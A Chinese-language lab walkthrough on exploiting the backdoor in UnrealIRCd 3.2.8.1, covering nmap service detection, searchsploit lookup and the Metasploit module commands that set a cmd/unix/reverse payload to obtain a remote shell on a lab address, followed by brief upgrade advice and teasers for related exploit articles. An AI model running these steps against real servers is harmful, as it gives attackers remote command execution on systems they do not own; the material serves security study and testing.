6-25漏洞利用-irc后门利用

2024-05-30 14:07:20

irc介绍

IRC是Internet Relay Chat 的英文缩写，中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展，目前世界上有超过60个国家提供了IRC的服务，IRC的工作原理非常简单，您只要在自己的PC上运行客户端软件，然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候，就可以通过irc聊天，它的特点是速度非常之快，聊天时几乎没有延迟现象，并且只占用很小的带宽资源，使得速度更快。所有用户可以在一个被称为"Channel"（频道）的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname（昵称），用来区分不同用户。

默认情况下，irc服务器运行在6667端口。

探测目标irc

使用nmap -sV -p 6667 IP地址探测目标irc版本信息

nmap -sV -p 6667 192.168.42.137

可以看到，很快探测出目标版本信息

msf利用irc后门

使用searchsploit查找可以利用的POC

searchsploit UnrealIRCd

可以查看到，当前软件是否存在问题，我们在这里选择Backdoor Command Execution（Metasploit），进行利用

use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set payload cmd/unix/reverse
show options
set lhost 192.168.42.128
exploit

利用msf中对于irc后门连接的模块，连接shell。

可以看到，探测完成，建立了session，我们可以在这里执行任意命令

修复防御

1、升级软件版本

2、更换其他软件

6-25漏洞利用-irc后门利用相关推荐

英特尔CPU控制机制存在隐秘开关可被黑客利用成为后门
本文讲的是英特尔CPU控制机制存在隐秘开关可被黑客利用成为后门,研究人员发现为政府客户设置的未公开通融措施俄罗斯科技公司 Positive Technologies 的安全研究员,发现了未公开配 ...
漏洞复现-webmin漏洞系列分析与利用
webmin漏洞系列分析与利用 Webmin 远程代码执行CVE-2022-0824 编号CVE编号:CVE-2022-0824 影响版本漏洞简介复现拉取漏洞镜像启动漏洞环境解决方案 POC ...
磊科路由器后门利用情况分析
重点物联网漏洞利用情况本节我们选取了两个漏洞进行分析.UPnP 相关的漏洞我们将在 4.4.3 进行分析,除去 UPnP 相关漏洞外,被利用最多的是 Eir D1000 路由器的一个漏洞 [44] ...
Redis未授权访问漏洞的重现与利用
前言: 最近配置openvas的时候安装了redis,听说曾经曝出过一个未授权访问漏洞,便找了一下相关资料想自己动手复现一下漏洞的利用过程,当然所有的攻击性操作都是在虚拟机上完成的,本文所有的操作是在 ...
Apache Tomcat 曝文件包含漏洞：攻击者可利用该漏洞读取webapp目录下的任意文件...
点击上方蓝色"程序猿DD",选择"设为星标" 回复"资源"获取独家整理的学习资料! 作者 | oschina 来源 | https://ww ...
别再问Cloudflare CDN 漏洞是怎么被利用的啦！这篇文就来告诉你
Cloudflare 已修复其免费开源 CDNJS 中的一个严重漏洞,该漏洞可能影响互联网上 12.7% 的网站. CDNJS为数百万网站提供超过4000个JavaScript和CSS库,这些库公开存 ...
Grafana 中存在严重的未授权任意文件读取漏洞，已遭利用
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...
Wget漏洞（CVE-2016-4971）利用方式解析
漏洞描述 wget是一个用来入侵Web服务器并拦截敏感数据的计算机程序.它基于shellshock漏洞对目标进行入侵.(FB注释:wget名称的由来是"World Wide Web" ...
XXE漏洞详解与利用
XXE:XML 外部实体注入 XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件.执行系统命令.内网探测与攻击等危害的一 ...

最新文章

热门文章